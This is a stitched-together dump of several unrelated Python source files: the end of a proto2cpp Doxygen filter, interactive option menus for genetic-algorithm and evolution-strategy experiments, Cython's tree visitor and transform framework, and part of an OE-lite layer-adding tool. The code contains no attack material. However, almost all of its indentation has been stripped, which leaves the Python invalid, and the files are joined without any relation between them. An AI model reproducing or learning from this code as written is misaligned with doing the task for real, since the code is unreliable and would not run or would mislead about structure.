# This is a workaround to get rid of extra empty line at the end which print() method adds.
lines = theOutput.splitlines()
for line in lines:
if len(line) > 0:
print(line)
# Our logger does not add extra line breaks so explicitly adding one to make the log more readable.
self.log(line + '\n')
else:
self.log('\n --- skipped empty line')
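  # Illustrative example of the conversion performed by parseFile() above
  # (for reference only, not executed):
  #
  #   .proto input:
  #     // A sample message.
  #     message Foo {
  #       repeated int32 ids = 1;  // identifiers
  #     }
  #
  #   C++-style output:
  #     /// A sample message.
  #     struct Foo {
  #       repeated<int32> ids = 1;  ///< identifiers
  #     };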
## Writes @p string to log file.
##
  ## #logLevel must be #logAll, otherwise the logging is skipped.
##
## @param string String to be written to log file.
#
def log(self, string):
if self.logLevel >= self.logAll:
with open(self.logFile, 'a') as theFile:
theFile.write(string)
## Writes @p string to error log file.
##
  ## #logLevel must be #logErrors or #logAll, otherwise the logging is skipped.
##
## @param string String to be written to error log file.
#
def logError(self, string):
    if self.logLevel >= self.logErrors:
with open(self.errorLogFile, 'a') as theFile:
theFile.write(string)
converter = proto2cpp()
# Doxygen will give us the file names
for filename in sys.argv[1:]:
converter.handleFile(filename)
# end of file
|
|
#!/usr/local/bin/python
# -*-coding:Utf-8 -*
import os
import math
def GA_settings():
"""Provides the view for the user setting of the GA experiments and returns the settings set"""
options = {}
os.system("clear")
print('===== OPTIONS =====\n')
preset = int(raw_input(
"PRESET\n"
"Use preset ?\n"
"\n\n-> 1: Source based preset\n"
"\n-> 2: I WANT TO SET BY MYSELF\n"
))
os.system("clear")
if preset == 1:
options["iterations"] = int(10000)
options["stopFitness"] = float(0.95)
options["mode"] = 'real'
options['crossMode'] = 'randomMultiPoint'
options["maximalPopulation"] = int(50)
options["mutationMode"] = 'oneNucleotid'
options["mutationProbability"] = float(0.05)
options["verbose"] = False
options["initialPopulation"] = int(100)
options['selectionMode'] = 'tournament'
elif preset == 2:
print('BASICS')
x = int(raw_input('Stop Iterations Number:\n'))
options['iterations'] = int(x)
options['stopFitness'] = float(raw_input(
'Stop Fitness:\n'
))
os.system('clear')
print('SELECTION')
options['selectionMode'] = int(raw_input(
'\nSelection Method:\n'
'--> 1: Roulette method\n'
'--> 2: Tournament method\n'
'--> 3: Roulette without replacement method\n'
))
if options['selectionMode'] == 1:
options['selectionMode'] = 'roulette'
elif options['selectionMode'] == 2:
options['selectionMode'] = 'tournament'
elif options['selectionMode'] == 3:
options['selectionMode'] = 'rouletteWR'
os.system('clear')
print('CROSSOVER & MUTATIONS')
options['mode'] = int(raw_input(
'Mode:\n'
'-> 1: Binary mode\n'
'-> 2: Real mode\n'
))
if options['mode'] == 1:
options['mode'] = 'binary'
elif options['mode'] == 2:
options['mode'] = 'real'
options['crossMode'] = int(raw_input(
'Crossover Mode:\n'
'--> 1: random one point\n'
'--> 2: random multipoint\n'
))
if options['crossMode'] == 1:
options['crossMode'] = 'randomOnePoint'
elif options['crossMode'] == 2:
options['crossMode'] = 'randomMultiPoint'
options['mutationMode'] = int(raw_input(
'Mutation Mode:\n'
'-> 0: Swap mode\n'
            '-> 1: Each nucleotide has a chance to be mutated, one by one\n'
            '-> 2: At most one mutation per child\n'
))
if options['mutationMode'] == 0:
options['mutationMode'] = 'swap'
elif options['mutationMode'] == 1:
options['mutationMode'] = 'everyNucleotid'
elif options['mutationMode'] == 2:
options['mutationMode'] = 'oneNucleotid'
options['mutationProbability'] = float(raw_input(
'Mutation Probability Mode:\n'
'-> 0 < n < 1: Fixed Probability\n'
'-> 2: Random Probability, basically between 1/BitArraySize and 1/PopulationSize\n'
))
os.system('clear')
print("POPULATION")
options["maximalPopulation"] = int(raw_input(
"Maximal Population:\n"
"-> n > 0: elitist insertion, just keep n best individuals\n"
"-> Other: every individual is kept (can slow down the algorythm for several iterations)\n"
"-> WARNING: If you set maximal population = 1 WITH roulette without replacement"
", your computer will explode\n"
))
options["initialPopulation"] = int(raw_input("Initialise with how much individuals ?\n"))
os.system("clear")
print("\nVERBOSE")
options["verbose"] = int(raw_input(
"Verbose Mode\n"
"-> 1: Enabled\n"
"-> 0: Disabled\n"
))
if options['verbose'] == 0:
options['verbose'] = False
elif options['verbose'] == 1:
options['verbose'] = True
os.system("clear")
return options
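# Usage sketch (illustrative): GA_settings() returns a plain dict of settings;
# with the source based preset, for example, options['mutationProbability'] is
# 0.05 and options['selectionMode'] is 'tournament'.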
def ES_settings():
"""Provides the view for the user setting of the ES experiments and returns the settings set"""
os.system("clear")
print('===== OPTIONS =====\n')
options = {}
preset = int(raw_input(
"PRESET\n"
"Use preset ?\n"
"\n\n-> 1: Source based preset\n"
"\n-> 2: I WANT TO SET BY MYSELF\n"
))
os.system("clear")
if preset == 1:
options["iterations"] = int(1000)
options["stopFitness"] = float(0.95)
options["base"] = int(10)
options['verbose'] = False
options['selectionMode'] = int(1)
options['mutationMode'] = '2LRNS'
options['recombinationMode'] = 'weighted'
options['sigmaBoost'] = True
elif preset == 2:
print('\nBASICS')
x = int(raw_input('Stop Iterations Number:\n'))
options["iterations"] = int(x)
options['stopFitness'] = float(raw_input('\nStop Fitness:\n'))
print("\nGENERATIONS")
options["base"] = int(raw_input(
'n setting:\n'
'lambda (number of child from the father) = 8 * n\n'
'mu (number of best child selected to make new father) = lambda / 4\n'
't (global step size) = 1 / (n)^(1/2)\n'
'ti (component step size) = 1 / (n)^(1/4)\n'
))
print('RECOMBINATION')
options['recombinationMode'] = int(raw_input(
'Recombination mode:\n'
'1- Intermediate\n'
'2- Select Best\n'
'3- Weighted\n'
))
if options['recombinationMode'] == 1:
options['recombinationMode'] = 'intermediate'
elif options['recombinationMode'] == 2:
options['recombinationMode'] = 'best'
elif options['recombinationMode'] == 3:
options['recombinationMode'] = 'weighted'
print('MUTATION')
options['mutationMode'] = int(raw_input(
'Mutation mode:\n'
'1- 2 Learning Rates, N Sigmas\n'
'2- 1 Learning Rate, 1 Sigma\n'
))
if options['mutationMode'] == 1:
options['mutationMode'] = '2LRNS'
elif options['mutationMode'] == 2:
options['mutationMode'] = '1LR1S'
print('SIGMA BOOST')
options['sigmaBoost'] = int(raw_input(
'Allow sigma boost YOLO special feature ?\n'
'1- sigma nitro enabled\n'
'2- sigma nitro disabled\n'
))
if options['sigmaBoost'] == 1:
options['sigmaBoost'] = True
elif options['sigmaBoost'] == 2:
options['sigmaBoost'] = False
print("\nVERBOSE")
options["verbose"] = int(raw_input(
"Verbose Mode\n"
"-> 1: Enabled\n"
"-> 0: Disabled\n"
))
os.system("clear")
options['maximalPopulation'] = 2 * options['base']
options['childNumber'] = 8 * options['base']
options['globalLearningRate'] = 1.0 / pow(options['base'], 0.5)
options['localLearningRate'] = 1.0 / pow(options['base'], 0.25)
return options
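# Worked example of the derived parameters (illustrative, assuming the source
# based preset where base n = 10):
#   childNumber        = 8 * 10       = 80
#   maximalPopulation  = 2 * 10       = 20
#   globalLearningRate = 1 / 10**0.5  ~= 0.316
#   localLearningRate  = 1 / 10**0.25 ~= 0.562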
|
|
# cython: infer_types=True
#
# Tree visitor and transform framework
#
from __future__ import absolute_import, print_function
import sys
import inspect
from . import TypeSlots
from . import Builtin
from . import Nodes
from . import ExprNodes
from . import Errors
from . import DebugFlags
from . import Future
import cython
cython.declare(_PRINTABLE=tuple)
if sys.version_info[0] >= 3:
_PRINTABLE = (bytes, str, int, float)
else:
_PRINTABLE = (str, unicode, long, int, float)
class TreeVisitor(object):
"""
Base class for writing visitors for a Cython tree, contains utilities for
recursing such trees using visitors. Each node is
expected to have a child_attrs iterable containing the names of attributes
containing child nodes or lists of child nodes. Lists are not considered
part of the tree structure (i.e. contained nodes are considered direct
children of the parent node).
visit_children visits each of the children of a given node (see the visit_children
documentation). When recursing the tree using visit_children, an attribute
access_path is maintained which gives information about the current location
in the tree as a stack of tuples: (parent_node, attrname, index), representing
the node, attribute and optional list index that was taken in each step in the path to
the current node.
Example:
>>> class SampleNode(object):
... child_attrs = ["head", "body"]
... def __init__(self, value, head=None, body=None):
... self.value = value
... self.head = head
... self.body = body
... def __repr__(self): return "SampleNode(%s)" % self.value
...
>>> tree = SampleNode(0, SampleNode(1), [SampleNode(2), SampleNode(3)])
>>> class MyVisitor(TreeVisitor):
... def visit_SampleNode(self, node):
... print("in %s %s" % (node.value, self.access_path))
... self.visitchildren(node)
... print("out %s" % node.value)
...
>>> MyVisitor().visit(tree)
in 0 []
in 1 [(SampleNode(0), 'head', None)]
out 1
in 2 [(SampleNode(0), 'body', 0)]
out 2
in 3 [(SampleNode(0), 'body', 1)]
out 3
out 0
"""
def __init__(self):
super(TreeVisitor, self).__init__()
self.dispatch_table = {}
self.access_path = []
def dump_node(self, node, indent=0):
ignored = list(node.child_attrs or []) + [u'child_attrs', u'pos',
u'gil_message', u'cpp_message',
u'subexprs']
values = []
pos = getattr(node, 'pos', None)
if pos:
source = pos[0]
if source:
import os.path
source = os.path.basename(source.get_description())
values.append(u'%s:%s:%s' % (source, pos[1], pos[2]))
attribute_names = dir(node)
attribute_names.sort()
for attr in attribute_names:
if attr in ignored:
continue
if attr.startswith(u'_') or attr.endswith(u'_'):
continue
try:
value = getattr(node, attr)
except AttributeError:
continue
if value is None or value == 0:
continue
elif isinstance(value, list):
value = u'[...]/%d' % len(value)
elif not isinstance(value, _PRINTABLE):
continue
else:
value = repr(value)
values.append(u'%s = %s' % (attr, value))
return u'%s(%s)' % (node.__class__.__name__,
u',\n '.join(values))
def _find_node_path(self, stacktrace):
import os.path
last_traceback = stacktrace
nodes = []
while hasattr(stacktrace, 'tb_frame'):
frame = stacktrace.tb_frame
node = frame.f_locals.get(u'self')
if isinstance(node, Nodes.Node):
code = frame.f_code
method_name = code.co_name
pos = (os.path.basename(code.co_filename),
frame.f_lineno)
nodes.append((node, method_name, pos))
last_traceback = stacktrace
stacktrace = stacktrace.tb_next
return (last_traceback, nodes)
def _raise_compiler_error(self, child, e):
import sys
trace = ['']
for parent, attribute, index in self.access_path:
node = getattr(parent, attribute)
if index is None:
index = ''
else:
node = node[index]
index = u'[%d]' % index
trace.append(u'%s.%s%s = %s' % (
parent.__class__.__name__, attribute, index,
self.dump_node(node)))
stacktrace, called_nodes = self._find_node_path(sys.exc_info()[2])
last_node = child
for node, method_name, pos in called_nodes:
last_node = node
trace.append(u"File '%s', line %d, in %s: %s" % (
pos[0], pos[1], method_name, self.dump_node(node)))
raise Errors.CompilerCrash(
getattr(last_node, 'pos', None), self.__class__.__name__,
u'\n'.join(trace), e, stacktrace)
@cython.final
def find_handler(self, obj):
# to resolve, try entire hierarchy
cls = type(obj)
pattern = "visit_%s"
mro = inspect.getmro(cls)
handler_method = None
for mro_cls in mro:
handler_method = getattr(self, pattern % mro_cls.__name__, None)
if handler_method is not None:
return handler_method
print(type(self), cls)
if self.access_path:
print(self.access_path)
print(self.access_path[-1][0].pos)
print(self.access_path[-1][0].__dict__)
raise RuntimeError("Visitor %r does not accept object: %s" % (self, obj))
def visit(self, obj):
return self._visit(obj)
@cython.final
def _visit(self, obj):
try:
try:
handler_method = self.dispatch_table[type(obj)]
except KeyError:
handler_method = self.find_handler(obj)
self.dispatch_table[type(obj)] = handler_method
return handler_method(obj)
except Errors.CompileError:
raise
except Errors.AbortError:
raise
except Exception as e:
if DebugFlags.debug_no_exception_intercept:
raise
self._raise_compiler_error(obj, e)
@cython.final
def _visitchild(self, child, parent, attrname, idx):
self.access_path.append((parent, attrname, idx))
result = self._visit(child)
self.access_path.pop()
return result
def visitchildren(self, parent, attrs=None):
return self._visitchildren(parent, attrs)
@cython.final
@cython.locals(idx=int)
def _visitchildren(self, parent, attrs):
"""
Visits the children of the given parent. If parent is None, returns
immediately (returning None).
The return value is a dictionary giving the results for each
child (mapping the attribute name to either the return value
or a list of return values (in the case of multiple children
in an attribute)).
"""
if parent is None: return None
result = {}
for attr in parent.child_attrs:
if attrs is not None and attr not in attrs: continue
child = getattr(parent, attr)
if child is not None:
if type(child) is list:
childretval = [self._visitchild(x, parent, attr, idx) for idx, x in enumerate(child)]
else:
childretval = self._visitchild(child, parent, attr, None)
assert not isinstance(childretval, list), 'Cannot insert list here: %s in %r' % (attr, parent)
result[attr] = childretval
return result
class VisitorTransform(TreeVisitor):
"""
    A tree transform is a base class for visitors that want to do stream
    processing of the structure (rather than attributes etc.) of a tree.
    It implements __call__ to simply visit the argument node.
    It requires the visitor methods to return the nodes which should take
    the place of the visited node in the result tree (which can be the same
    node, or one or more replacement nodes). Specifically, if the return
    value from a visitor method is:
- [] or None; the visited node will be removed (set to None if an attribute and
removed if in a list)
- A single node; the visited node will be replaced by the returned node.
- A list of nodes; the visited nodes will be replaced by all the nodes in the
list. This will only work if the node was already a member of a list; if it
was not, an exception will be raised. (Typically you want to ensure that you
are within a StatListNode or similar before doing this.)
"""
def visitchildren(self, parent, attrs=None):
result = self._visitchildren(parent, attrs)
for attr, newnode in result.items():
if type(newnode) is not list:
setattr(parent, attr, newnode)
else:
# Flatten the list one level and remove any None
newlist = []
for x in newnode:
if x is not None:
if type(x) is list:
newlist += x
else:
newlist.append(x)
setattr(parent, attr, newlist)
return result
def recurse_to_children(self, node):
self.visitchildren(node)
return node
def __call__(self, root):
return self._visit(root)
class CythonTransform(VisitorTransform):
"""
Certain common conventions and utilities for Cython transforms.
- Sets up the context of the pipeline in self.context
- Tracks directives in effect in self.current_directives
"""
def __init__(self, context):
super(CythonTransform, self).__init__()
self.context = context
def __call__(self, node):
from . import ModuleNode
if isinstance(node, ModuleNode.ModuleNode):
self.current_directives = node.directives
return super(CythonTransform, self).__call__(node)
def visit_CompilerDirectivesNode(self, node):
old = self.current_directives
self.current_directives = node.directives
self.visitchildren(node)
self.current_directives = old
return node
def visit_Node(self, node):
self.visitchildren(node)
return node
class ScopeTrackingTransform(CythonTransform):
# Keeps track of type of scopes
#scope_type: can be either of 'module', 'function', 'cclass', 'pyclass', 'struct'
#scope_node: the node that owns the current scope
def visit_ModuleNode(self, node):
self.scope_type = 'module'
self.scope_node = node
self.visitchildren(node)
return node
def visit_scope(self, node, scope_type):
prev = self.scope_type, self.scope_node
self.scope_type = scope_type
self.scope_node = node
self.visitchildren(node)
self.scope_type, self.scope_node = prev
return node
def visit_CClassDefNode(self, node):
return self.visit_scope(node, 'cclass')
def visit_PyClassDefNode(self, node):
return self.visit_scope(node, 'pyclass')
def visit_FuncDefNode(self, node):
return self.visit_scope(node, 'function')
def visit_CStructOrUnionDefNode(self, node):
return self.visit_scope(node, 'struct')
class EnvTransform(CythonTransform):
"""
This transformation keeps a stack of the environments.
"""
def __call__(self, root):
self.env_stack = []
self.enter_scope(root, root.scope)
return super(EnvTransform, self).__call__(root)
def current_env(self):
return self.env_stack[-1][1]
def current_scope_node(self):
return self.env_stack[-1][0]
def global_scope(self):
return self.current_env().global_scope()
def enter_scope(self, node, scope):
self.env_stack.append((node, scope))
def exit_scope(self):
self.env_stack.pop()
def visit_FuncDefNode(self, node):
self.enter_scope(node, node.local_scope)
self.visitchildren(node)
self.exit_scope()
return node
def visit_GeneratorBodyDefNode(self, node):
self.visitchildren(node)
return node
def visit_ClassDefNode(self, node):
self.enter_scope(node, node.scope)
self.visitchildren(node)
self.exit_scope()
return node
def visit_CStructOrUnionDefNode(self, node):
self.enter_scope(node, node.scope)
self.visitchildren(node)
self.exit_scope()
return node
def visit_ScopedExprNode(self, node):
if node.expr_scope:
self.enter_scope(node, node.expr_scope)
self.visitchildren(node)
self.exit_scope()
else:
self.visitchildren(node)
return node
def visit_CArgDeclNode(self, node):
# default arguments are evaluated in the outer scope
if node.default:
attrs = [ attr for attr in node.child_attrs if attr != 'default' ]
self.visitchildren(node, attrs)
self.enter_scope(node, self.current_env().outer_scope)
self.visitchildren(node, ('default',))
self.exit_scope()
else:
self.visitchildren(node)
return node
class NodeRefCleanupMixin(object):
"""
Clean up references to nodes that were replaced.
NOTE: this implementation assumes that the replacement is
done first, before hitting any further references during
normal tree traversal. This needs to be arranged by calling
"self.visitchildren()" at a proper place in the transform
and by ordering the "child_attrs" of nodes appropriately.
"""
def __init__(self, *args):
super(NodeRefCleanupMixin, self).__init__(*args)
self._replacements = {}
def visit_CloneNode(self, node):
arg = node.arg
if arg not in self._replacements:
self.visitchildren(arg)
node.arg = self._replacements.get(arg, arg)
return node
def visit_ResultRefNode(self, node):
expr = node.expression
if expr is None or expr not in self._replacements:
self.visitchildren(node)
expr = node.expression
if expr is not None:
node.expression = self._replacements.get(expr, expr)
return node
def replace(self, node, replacement):
self._replacements[node] = replacement
return replacement
find_special_method_for_binary_operator = {
'<': '__lt__',
'<=': '__le__',
'==': '__eq__',
'!=': '__ne__',
'>=': '__ge__',
'>': '__gt__',
'+': '__add__',
'&': '__and__',
'/': '__div__',
'//': '__floordiv__',
'<<': '__lshift__',
'%': '__mod__',
'*': '__mul__',
'|': '__or__',
'**': '__pow__',
'>>': '__rshift__',
'-': '__sub__',
'^': '__xor__',
'in': '__contains__',
}.get
find_special_method_for_unary_operator = {
'not': '__not__',
'~': '__inv__',
'-': '__neg__',
'+': '__pos__',
}.get
class MethodDispatcherTransform(EnvTransform):
"""
Base class for transformations that want to intercept on specific
builtin functions or methods of builtin types, including special
methods triggered by Python operators. Must run after declaration
analysis when entries were assigned.
Naming pattern for handler methods is as follows:
* builtin functions: _handle_(general|simple|any)_function_NAME
* builtin methods: _handle_(general|simple|any)_method_TYPENAME_METHODNAME
"""
# only visit call nodes and Python operations
def visit_GeneralCallNode(self, node):
self.visitchildren(node)
function = node.function
if not function.type.is_pyobject:
return node
arg_tuple = node.positional_args
if not isinstance(arg_tuple, ExprNodes.TupleNode):
return node
keyword_args = node.keyword_args
if keyword_args and not isinstance(keyword_args, ExprNodes.DictNode):
# can't handle **kwargs
return node
args = arg_tuple.args
return self._dispatch_to_handler(node, function, args, keyword_args)
def visit_SimpleCallNode(self, node):
self.visitchildren(node)
function = node.function
if function.type.is_pyobject:
arg_tuple = node.arg_tuple
if not isinstance(arg_tuple, ExprNodes.TupleNode):
return node
args = arg_tuple.args
else:
args = node.args
return self._dispatch_to_handler(node, function, args, None)
def visit_PrimaryCmpNode(self, node):
if node.cascade:
# not currently handled below
self.visitchildren(node)
return node
return self._visit_binop_node(node)
def visit_BinopNode(self, node):
return self._visit_binop_node(node)
def _visit_binop_node(self, node):
self.visitchildren(node)
# FIXME: could special case 'not_in'
special_method_name = find_special_method_for_binary_operator(node.operator)
if special_method_name:
operand1, operand2 = node.operand1, node.operand2
if special_method_name == '__contains__':
operand1, operand2 = operand2, operand1
elif special_method_name == '__div__':
if Future.division in self.current_env().global_scope().context.future_directives:
special_method_name = '__truediv__'
obj_type = operand1.type
if obj_type.is_builtin_type:
type_name = obj_type.name
else:
type_name = "object" # safety measure
node = self._dispatch_to_method_handler(
special_method_name, None, False, type_name,
node, None, [operand1, operand2], None)
return node
def visit_UnopNode(self, node):
self.visitchildren(node)
special_method_name = find_special_method_for_unary_operator(node.operator)
if special_method_name:
operand = node.operand
obj_type = operand.type
if obj_type.is_builtin_type:
type_name = obj_type.name
else:
type_name = "object" # safety measure
node = self._dispatch_to_method_handler(
special_method_name, None, False, type_name,
node, None, [operand], None)
return node
### dispatch to specific handlers
def _find_handler(self, match_name, has_kwargs):
call_type = has_kwargs and 'general' or 'simple'
handler = getattr(self, '_handle_%s_%s' % (call_type, match_name), None)
if handler is None:
handler = getattr(self, '_handle_any_%s' % match_name, None)
return handler
def _delegate_to_assigned_value(self, node, function, arg_list, kwargs):
assignment = function.cf_state[0]
value = assignment.rhs
if value.is_name:
if not value.entry or len(value.entry.cf_assignments) > 1:
# the variable might have been reassigned => play safe
return node
elif value.is_attribute and value.obj.is_name:
if not value.obj.entry or len(value.obj.entry.cf_assignments) > 1:
# the underlying variable might have been reassigned => play safe
return node
else:
return node
return self._dispatch_to_handler(
node, value, arg_list, kwargs)
def _dispatch_to_handler(self, node, function, arg_list, kwargs):
if function.is_name:
# we only consider functions that are either builtin
# Python functions or builtins that were already replaced
# into a C function call (defined in the builtin scope)
if not function.entry:
return node
is_builtin = (
function.entry.is_builtin or
function.entry is self.current_env().builtin_scope().lookup_here(function.name))
if not is_builtin:
if function.cf_state and function.cf_state.is_single:
# we know the value of the variable
# => see if it's usable instead
return self._delegate_to_assigned_value(
node, function, arg_list, kwargs)
return node
function_handler = self._find_handler(
"function_%s" % function.name, kwargs)
if function_handler is None:
return self._handle_function(node, function.name, function, arg_list, kwargs)
if kwargs:
return function_handler(node, function, arg_list, kwargs)
else:
return function_handler(node, function, arg_list)
elif function.is_attribute:
attr_name = function.attribute
if function.type.is_pyobject:
self_arg = function.obj
elif node.self and function.entry:
entry = function.entry.as_variable
if not entry or not entry.is_builtin:
return node
# C implementation of a Python builtin method - see if we find further matches
self_arg = node.self
arg_list = arg_list[1:] # drop CloneNode of self argument
else:
return node
obj_type = self_arg.type
is_unbound_method = False
if obj_type.is_builtin_type:
if (obj_type is Builtin.type_type and self_arg.is_name and
arg_list and arg_list[0].type.is_pyobject):
# calling an unbound method like 'list.append(L,x)'
# (ignoring 'type.mro()' here ...)
type_name = self_arg.name
self_arg = None
is_unbound_method = True
else:
type_name = obj_type.name
else:
type_name = "object" # safety measure
return self._dispatch_to_method_handler(
attr_name, self_arg, is_unbound_method, type_name,
node, function, arg_list, kwargs)
else:
return node
def _dispatch_to_method_handler(self, attr_name, self_arg,
is_unbound_method, type_name,
node, function, arg_list, kwargs):
method_handler = self._find_handler(
"method_%s_%s" % (type_name, attr_name), kwargs)
if method_handler is None:
if (attr_name in TypeSlots.method_name_to_slot
or attr_name == '__new__'):
method_handler = self._find_handler(
"slot%s" % attr_name, kwargs)
if method_handler is None:
return self._handle_method(
node, type_name, attr_name, function,
arg_list, is_unbound_method, kwargs)
if self_arg is not None:
arg_list = [self_arg] + list(arg_list)
if kwargs:
result = method_handler(
node, function, arg_list, is_unbound_method, kwargs)
else:
result = method_handler(
node, function, arg_list, is_unbound_method)
return result
def _handle_function(self, node, function_name, function, arg_list, kwargs):
"""Fallback handler"""
return node
def _handle_method(self, node, type_name, attr_name, function,
arg_list, is_unbound_method, kwargs):
"""Fallback handler"""
return node
class RecursiveNodeReplacer(VisitorTransform):
"""
Recursively replace all occurrences of a node in a subtree by
another node.
"""
def __init__(self, orig_node, new_node):
super(RecursiveNodeReplacer, self).__init__()
self.orig_node, self.new_node = orig_node, new_node
def visit_CloneNode(self, node):
if node is self.orig_node:
return self.new_node
if node.arg is self.orig_node:
node.arg = self.new_node
return node
def visit_Node(self, node):
self.visitchildren(node)
if node is self.orig_node:
return self.new_node
else:
return node
def recursively_replace_node(tree, old_node, new_node):
replace_in = RecursiveNodeReplacer(old_node, new_node)
replace_in(tree)
class NodeFinder(TreeVisitor):
"""
Find out if a node appears in a subtree.
"""
def __init__(self, node):
super(NodeFinder, self).__init__()
self.node = node
self.found = False
def visit_Node(self, node):
if self.found:
pass # short-circuit
elif node is self.node:
self.found = True
else:
self._visitchildren(node, None)
def tree_contains(tree, node):
finder = NodeFinder(node)
finder.visit(tree)
return finder.found
# Utils
def replace_node(ptr, value):
"""Replaces a node. ptr is of the form used on the access path stack
(parent, attrname, listidx|None)
"""
parent, attrname, listidx = ptr
if listidx is None:
setattr(parent, attrname, value)
else:
getattr(parent, attrname)[listidx] = value
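# Example (illustrative): for an access-path entry (parent, 'body', 0),
# replace_node((parent, 'body', 0), new_node) performs parent.body[0] = new_node,
# while (parent, 'body', None) would instead perform parent.body = new_node.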
class PrintTree(TreeVisitor):
"""Prints a representation of the tree to standard output.
Subclass and override repr_of to provide more information
about nodes. """
def __init__(self, start=None, end=None):
TreeVisitor.__init__(self)
self._indent = ""
if start is not None or end is not None:
self._line_range = (start or 0, end or 2**30)
else:
self._line_range = None
def indent(self):
self._indent += " "
def unindent(self):
self._indent = self._indent[:-2]
def __call__(self, tree, phase=None):
print("Parse tree dump at phase '%s'" % phase)
self.visit(tree)
return tree
    # Don't do anything about process_list; the defaults give
    # nice-looking name[idx] nodes which will visually appear
    # under the parent node, not displaying the list itself in
    # the hierarchy.
def visit_Node(self, node):
self._print_node(node)
self.indent()
self.visitchildren(node)
self.unindent()
return node
def visit_CloneNode(self, node):
self._print_node(node)
self.indent()
line = node.pos[1]
if self._line_range is None or self._line_range[0] <= line <= self._line_range[1]:
print("%s- %s: %s" % (self._indent, 'arg', self.repr_of(node.arg)))
self.indent()
self.visitchildren(node.arg)
self.unindent()
self.unindent()
return node
def _print_node(self, node):
line = node.pos[1]
if self._line_range is None or self._line_range[0] <= line <= self._line_range[1]:
if len(self.access_path) == 0:
name = "(root)"
else:
parent, attr, idx = self.access_path[-1]
if idx is not None:
name = "%s[%d]" % (attr, idx)
else:
name = attr
print("%s- %s: %s" % (self._indent, name, self.repr_of(node)))
def repr_of(self, node):
if node is None:
return "(none)"
else:
result = node.__class__.__name__
if isinstance(node, ExprNodes.NameNode):
result += "(type=%s, name=\"%s\")" % (repr(node.type), node.name)
elif isinstance(node, Nodes.DefNode):
result += "(name=\"%s\")" % node.name
elif isinstance(node, ExprNodes.ExprNode):
t = node.type
result += "(type=%s)" % repr(t)
elif node.pos:
pos = node.pos
path = pos[0].get_description()
if '/' in path:
path = path.split('/')[-1]
if '\\' in path:
path = path.split('\\')[-1]
result += "(pos=(%s:%s:%s))" % (path, pos[1], pos[2])
return result
if __name__ == "__main__":
import doctest
doctest.testmod()
|
|
import oebakery
import logging
import oelite.util
import oelite.git
import sys
import os
import subprocess
description = "Add layer to manifest helper tool"
arguments = (
("layer", "Name of the layer to add (fx. meta/qt or src/linux)", 0),
)
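# Example invocation (illustrative; this assumes the tool is run through the
# usual 'oe' bakery front-end, the exact command name may differ):
#
#   oe add-layer -t meta -u git://oe-lite.org/oe-lite/base.git meta/base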
def add_parser_options(parser):
parser.add_option(
'-d', '--debug',
action="store_true", default=False,
help="Show debug messages")
parser.add_option(
'-t', '--type',
help="Layer type (fx. meta, linux, u-boot or barebox)")
parser.add_option(
'-u', '--url',
help="URL of git repository to use as layer")
parser.add_option(
'-b', '--branch',
help="Branch to use as initial master branch")
parser.add_option(
'-c', '--commit',
help="Commit to use as initial master branch head")
return
def parse_args(options, args):
if options.debug:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
if len(args) != 1:
return "bad argument count: %d (1 required)"%(len(args))
options.layer = args.pop(0)
return
def run(options, args, config):
logging.debug("add-layer.run %s", options)
return add_layer(options)
_dir_stack = []
def pushd(path):
global _dir_stack
_dir_stack.append(os.getcwd())
os.chdir(path)
def popd():
global _dir_stack
os.chdir(_dir_stack.pop())
def add_layer(args):
if not args.type:
if args.layer.startswith('meta/'):
args.type = 'meta'
elif args.layer.startswith('src/'):
if 'linux' in args.layer:
args.type = 'linux'
elif 'u-boot' in args.layer:
args.type = 'u-boot'
elif 'barebox' in args.layer:
args.type = 'barebox'
else:
args.type = 'src'
elif args.layer.startswith('lib/'):
args.type = 'lib'
else:
logging.error("unable determine layer type, please use '-t'")
sys.exit(1)
elif args.type == 'meta' and not args.layer.startswith('meta/'):
args.layer = os.path.join('meta', args.layer)
elif (args.type in ('src', 'linux', 'u-boot', 'barebox')
and not args.layer.startswith('src/')):
args.layer = os.path.join('src', args.layer)
elif args.type == 'lib' and not args.layer.startswith('lib/'):
args.layer = os.path.join('lib', args.layer)
if not args.url:
if args.type == 'meta':
logging.warning("URL not specified, using OE-lite.org")
args.url = "git://oe-lite.org/oe-lite/%s.git"%(
os.path.basename(args.layer))
elif args.type == 'linux':
logging.warning(
"URL not specified, using linux-stable from Greg Kroah-Hartman")
args.url = "git://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git"
elif args.type == 'u-boot':
logging.warning(
"URL not specified, using upstream from DENX")
args.url = "git://git.denx.de/u-boot.git"
elif args.type == 'barebox':
logging.warning(
"URL not specified, using upstream from Pengutronix")
args.url = "git://git.pengutronix.de/git/barebox.git"
else:
logging.error("URL not specified, please use '-u'")
sys.exit(1)
add_submodule(args)
if args.commit:
# FIXME: use oelite.git module to figure out if tag or sha1
args.src_rev = 'commit=%s'%(args.commit)
elif args.branch:
args.src_rev = 'branch=%s'%(args.branch)
else:
args.src_rev = 'branch=HEAD'
if args.type == 'meta':
return add_meta(args)
elif args.type == 'linux':
return add_linux(args)
elif args.type == 'u-boot':
return add_uboot(args)
elif args.type == 'barebox':
return add_barebox(args)
def add_linux(args):
recipe_dir = 'recipes/linux'
recipe_name = os.path.basename(args.layer).replace('_', '-')
add_recipe(os.path.join(recipe_dir, '%s_git.oe'%(recipe_name)),
"Linux recipe for building from remote git repository",
['kernel'], args.url, src_rev=args.src_rev)
add_recipe(os.path.join(recipe_dir, '%s_local.oe'%(recipe_name)),
"Linux recipe for building directly from manifest repository",
               ['kernel'], 'file://${TOPDIR}/%s'%(args.layer), priority=-1)
commit_recipes(args)
def add_uboot(args):
recipe_dir = 'recipes/u-boot'
recipe_name = os.path.basename(args.layer).replace('_', '-')
add_recipe(os.path.join(recipe_dir, '%s_git.oe'%(recipe_name)),
"U-Boot recipe for building from remote git repository",
['u-boot'], args.url, src_rev=args.src_rev)
add_recipe(os.path.join(recipe_dir, '%s_local.oe'%(recipe_name)),
"U-Boot recipe for building directly from manifest repository",
['u-boot'], 'file://${TOPDIR}/%s'%(args.layer), priority=-1)
commit_recipes(args)
def add_barebox(args):
recipe_dir = 'recipes/barebox'
recipe_name = os.path.basename(args.layer).replace('_', '-')
add_recipe(os.path.join(recipe_dir, '%s_git.oe'%(recipe_name)),
"Barebox recipe for building from remote git repository",
['barebox'], args.url, src_rev=args.src_rev)
add_recipe(os.path.join(recipe_dir, '%s_local.oe'%(recipe_name)),
"Barebox recipe for building directly from manifest repository",
['barebox'], 'file://${TOPDIR}/%s'%(args.layer), priority=-1)
commit_recipes(args)
